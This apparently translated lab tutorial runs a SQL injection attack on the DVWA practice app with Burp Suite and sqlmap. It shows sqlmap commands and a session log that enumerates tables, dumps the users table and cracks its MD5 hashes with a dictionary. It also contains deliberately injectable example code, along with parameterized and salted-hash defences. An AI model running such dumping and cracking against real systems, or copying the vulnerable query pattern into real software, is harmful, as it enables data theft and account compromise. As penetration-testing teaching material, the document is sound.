0x1: Introduction to tools and environment
DVWA: penetration test practice environment
Burp Suite: a powerful web security testing tool
sqlmap: a powerful SQL injection tool
The above tools and environments are installed and configured on Kali Linux.
0x2: Steps
- Configure Burp Suite and the browser.
This is a simple step; its purpose is to capture the request that will be used for the SQL injection test.
Set the proxy listener in Burp to 127.0.0.1:8080 and configure the browser to use that proxy, so that Burp captures the browser's requests.
- Capture the login request
The Burp Proxy tab captures the requests the browser sends, as follows:
The captured request contains the id parameter. Because the DVWA security level has been set to low, there is certain to be an injection point. The next step is to test it with sqlmap.
sqlmap is powerful; its usage can be looked up in the manual.
Here sqlmap confirms that the id parameter is an injection point. Next, list the tables in the DVWA database:
Because the injection requires the session cookie, the raw request captured above is copied to a file, which sqlmap reads later with -r.
sqlmap -r /HOME/FLYER/TEST-SEC/1 --current-user --current-db --tables shows the tables; since the application connects as the root database user, the tables of every database are visible.
Only DVWA tables are listed here:
Database:dvwa
[2 tables]
+----------------------------------------------+
| Guestbook |
| Users |
+----------------------------------------------+
These commands confirm the SQL injection and also retrieve the table names of the dvwa database. A users table is visible, so the next step is to look inside it for useful information.
- Dump the users table and crack the passwords:
The session is shown below; sqlmap prints the detailed procedure, so it is not repeated here.
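To make the design point concrete, here is an added example (Python with SQLite, not DVWA's own PHP) that models the users table above and puts the concatenated query that sqlmap exploited next to a parameterized one; the table rows, the integer check and the compare() helper are constructed for illustration.

```python
import re
import sqlite3

# Constructed stand-in for the dvwa.users table dumped above (added example,
# not DVWA's own PHP). Only the columns the lookup needs are modelled.
SEED_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Brown", "Gordon"),
    (3, "1337", "Me", "Hack"),
]

def make_db():
    """In-memory SQLite database seeded with the constructed users rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, last_name TEXT, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SEED_USERS)
    return db

def lookup_vulnerable(db, raw_id):
    """The weak pattern: the id parameter is pasted into the SQL text."""
    # Whatever the client sends becomes part of the statement, so a value that
    # closes the quote can append its own conditions. This is the class of bug
    # sqlmap detected on DVWA's id parameter at the low security level.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    """Hardened: the statement is fixed and the value is bound separately."""
    # The value reaches the engine as data for the placeholder, never as SQL,
    # so no input can change the structure of the WHERE clause.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def is_valid_id(raw_id):
    """user_id is numeric, so reject anything that is not a plain integer."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None

def lookup_hardened(db, raw_id):
    """Defence in depth: validate the expected type, then bind the parameter."""
    if not is_valid_id(raw_id):
        raise ValueError("user_id must be a positive integer")
    return lookup_parameterized(db, int(raw_id))

def compare(raw_id):
    """(rows from the vulnerable lookup, rows from the parameterized lookup)."""
    db = make_db()
    return len(lookup_vulnerable(db, raw_id)), len(lookup_parameterized(db, raw_id))
```

For a benign id both lookups return the same single row; for an input that closes the quote and appends a tautology, the concatenated query returns every row while the bound query returns none.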
[Email protected]:/var/www# sqlmap -r /HOME/FLYER/TEST-SEC/1 --search -D dvwa -T users
[sqlmap banner] {1.0-dev-nongit-20150510} http://sqlmap.org
Do you want sqlmap to consider provided table(s):
[1] as like table names (default)
[2] as exact table names
> 2
[21:35:03] [INFO] Searching table ' users ' for database ' DVWA '
[21:35:03] [WARNING] reflective value (s) found and filtering out
Database:dvwa
[1 Table]
+-------+
| users |
+-------+
Do you want to dump tables' entries? [y/n] Y
which database (s)?
[A]ll (default)
[DVWA]
[Q]uit
> Dvwa
which table (s) of database ' Dvwa '?
[A]ll (default)
[Users]
[S]kip
[Q]uit
> Users
[21:35:24] [INFO] fetching columns for table ' users ' in database ' Dvwa '
[21:35:24] [INFO] fetching entries for table ' users ' in database ' Dvwa '
[21:35:24] [INFO] Analyzing table dump for possible password hashes
[21:35:24] [INFO] recognized possible password hashes in column ' Password '
Do you want to store hashes to a temporary file for eventual further processing with other tools [y/n] y
[21:35:30] [INFO] writing hashes to a temporary file '/tmp/sqlmapmliboq15506/sqlmaphashes-rpfigo.txt '
Do you want to crack them via a dictionary-based attack? [y/n/q] Y
[21:35:36] [INFO] using hash method ' MD5_GENERIC_PASSWD '
What dictionary do you want to use?
[1] Default dictionary file '/usr/share/sqlmap/txt/wordlist.zip ' (press Enter)
[2] custom dictionary file
[3] file with List of dictionary files
>
[21:35:47] [INFO] using default dictionary
Do you want to use common password suffixes? (slow!) [y/n] y
[21:35:54] [INFO] starting dictionary-based cracking (MD5_GENERIC_PASSWD)
[21:35:54] [INFO] Starting 2 processes
[21:35:54] [INFO] cracked password ' 1111 ' for hash ' B59c67bf196a4758191e42f76670ceba '
[21:35:57] [INFO] cracked password ' abc123 ' for hash ' e99a18c428cb38d5f260853678922e03 '
[21:36:00] [INFO] cracked password ' Charley ' for Hash ' 8d3533d75ae2c3966d7e0d4fcc69216b '
[21:36:05] [INFO] cracked password ' letmein ' for hash ' 0d107d09f5bbe40cade3de5c71e9e9b7 '
[21:36:07] [INFO] cracked password ' password ' for hash ' 5f4dcc3b5aa765d61d8327deb882cf99 '
[21:36:11] [INFO] postprocessing table Dump
Database:dvwa
table:users
[5 Entries]
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                           | password                                    | last_name | first_name |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | b59c67bf196a4758191e42f76670ceba (1111)     | admin     | admin      |
| 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (Charley)  | Me        | Hack       |
| 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (Letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
0x3: Summary
The cracking succeeded: the user names and passwords are listed.
When designing a site, SQL injection must be taken into account, or users' sensitive information is easily leaked.
Here the password hashes were cracked quickly with sqlmap's own built-in dictionary, which shows that the users' passwords were unsafe.
Passwords must not be common combinations or values with obvious meaning.
SQL injection testing and user name/password brute-force cracking of DVWA with Burp Suite and sqlmap
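An added example, not from the original post, that shows why the dump above was so easy to crack and what the storage should look like instead: the unsalted MD5 that DVWA uses is reproduced for the hashes listed, and the deny-list, length rule and PBKDF2 parameters are my own assumptions.

```python
import hashlib
import hmac
import os

# Constructed deny-list: the passwords recovered from the dump above plus a
# few other common choices. A real deployment would use a large breached list.
COMMON_PASSWORDS = {"1111", "abc123", "charley", "letmein", "password", "123456"}
PBKDF2_ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256

def unsalted_md5(password):
    """How DVWA stores passwords: one fixed, precomputable MD5 digest per password."""
    # No salt and a fast hash, so the same password always gives the same hex
    # string, and a dictionary hashed once can be matched against every user.
    return hashlib.md5(password.encode()).hexdigest()

def password_is_acceptable(password):
    """Reject the weak choices seen in the dump before they are ever stored."""
    return len(password) >= 12 and password.lower() not in COMMON_PASSWORDS

def hash_password(password, salt=None):
    """Salted, slow PBKDF2-HMAC-SHA256; returns 'pbkdf2_sha256$iter$salt$digest'."""
    # A random per-user salt means equal passwords give different records and
    # no precomputed dictionary applies; the iteration count makes each guess slow.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)
```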